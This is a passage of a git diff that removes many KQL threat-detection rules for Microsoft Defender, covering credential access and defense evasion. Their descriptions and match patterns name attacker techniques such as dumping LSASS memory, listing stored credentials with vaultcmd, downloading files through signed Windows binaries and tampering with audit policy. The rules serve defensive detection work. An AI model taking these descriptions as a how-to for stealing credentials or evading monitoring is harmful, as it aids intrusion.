-| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql b/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql
deleted file mode 100644
index 28c58e45..00000000
--- a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies storage symbolic link creation using operating systems utilities
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql b/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql
deleted file mode 100644
index 2afb8c5f..00000000
--- a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/27
-// Level: high
-// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe")
\ No newline at end of file
diff --git a/Credential Access/Windows_Credential_Editor_Registry.kql b/Credential Access/Windows_Credential_Editor_Registry.kql
deleted file mode 100644
index df152890..00000000
--- a/Credential Access/Windows_Credential_Editor_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/12/31
-// Level: critical
-// Description: Detects the use of Windows Credential Editor (WCE)
-// Tags: attack.credential_access, attack.t1003.001, attack.s0005
-DeviceRegistryEvents
-| where RegistryKey contains "Services\\WCESERVICE\\Start"
\ No newline at end of file
diff --git a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql b/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql
deleted file mode 100644
index 823b25cd..00000000
--- a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: medium
-// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
-// Tags: attack.credential_access, attack.t1555.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql b/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql
deleted file mode 100644
index 5c77ac85..00000000
--- a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/04
-// Level: medium
-// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Defense Evasion/Abusing_Print_Executable.kql b/Defense Evasion/Abusing_Print_Executable.kql
deleted file mode 100644
index a62f50b9..00000000
--- a/Defense Evasion/Abusing_Print_Executable.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020/10/05
-// Level: medium
-// Description: Attackers can use print.exe for remote file copy
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql b/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql
deleted file mode 100644
index 3969c5ac..00000000
--- a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: low
-// Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
-// Tags: attack.t1070.008, attack.defense_evasion
-DeviceFileEvents
-| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql b/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql
deleted file mode 100644
index 6a5eaf90..00000000
--- a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress"
\ No newline at end of file
diff --git a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql b/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql
deleted file mode 100644
index 9a560793..00000000
--- a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun"
\ No newline at end of file
diff --git a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql b/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql
deleted file mode 100644
index 65afca78..00000000
--- a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects usage of winget to add a new insecure (http) download source.
-Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Add_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_New_Download_Source_To_Winget.kql
deleted file mode 100644
index cc0181f1..00000000
--- a/Defense Evasion/Add_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new additional download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
deleted file mode 100644
index 2fc70f43..00000000
--- a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new potentially suspicious download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql b/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql
deleted file mode 100644
index 350c9856..00000000
--- a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/02
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot"
\ No newline at end of file
diff --git a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql b/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql
deleted file mode 100644
index e61ed7f2..00000000
--- a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/AgentExecutor_PowerShell_Execution.kql
deleted file mode 100644
index 01323d08..00000000
--- a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022/12/24
-// Level: medium
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql b/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql
deleted file mode 100644
index 7d763754..00000000
--- a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp"
\ No newline at end of file
diff --git a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql b/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql
deleted file mode 100644
index 3528b66c..00000000
--- a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
-// Tags: attack.defense_evasion
-DeviceImageLoadEvents
-| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql b/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql
deleted file mode 100644
index d8a1500d..00000000
--- a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects execution of of Dxcap.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql b/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql
deleted file mode 100644
index caf25951..00000000
--- a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql b/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql
deleted file mode 100644
index fb086580..00000000
--- a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
deleted file mode 100644
index 124d7a9b..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
deleted file mode 100644
index f28e5897..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
deleted file mode 100644
index 03309431..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSOHTMED" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql
deleted file mode 100644
index 6f5fc727..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
deleted file mode 100644
index 3f3dd72d..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql
deleted file mode 100644
index b4580a08..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql b/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
deleted file mode 100644
index 8441648d..00000000
--- a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/Defense Evasion/AspNetCompiler_Execution.kql b/Defense Evasion/AspNetCompiler_Execution.kql
deleted file mode 100644
index 52dbd8ef..00000000
--- a/Defense Evasion/AspNetCompiler_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/24
-// Level: medium
-// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql b/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql
deleted file mode 100644
index ec22dd8d..00000000
--- a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS "
\ No newline at end of file
diff --git a/Defense Evasion/Atbroker_Registry_Change.kql b/Defense Evasion/Atbroker_Registry_Change.kql
deleted file mode 100644
index 465dcede..00000000
--- a/Defense Evasion/Atbroker_Registry_Change.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
-// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql
deleted file mode 100644
index 833d5e8a..00000000
--- a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps)
-// Date: 2021/02/02
-// Level: high
-// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql
deleted file mode 100644
index ee26e9fb..00000000
--- a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: high
-// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none"
\ No newline at end of file
diff --git a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql b/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql
deleted file mode 100644
index d58c690b..00000000
--- a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
-// Date: 2020/10/23
-// Level: high
-// Description: Detects attackers using tooling with bad opsec defaults.
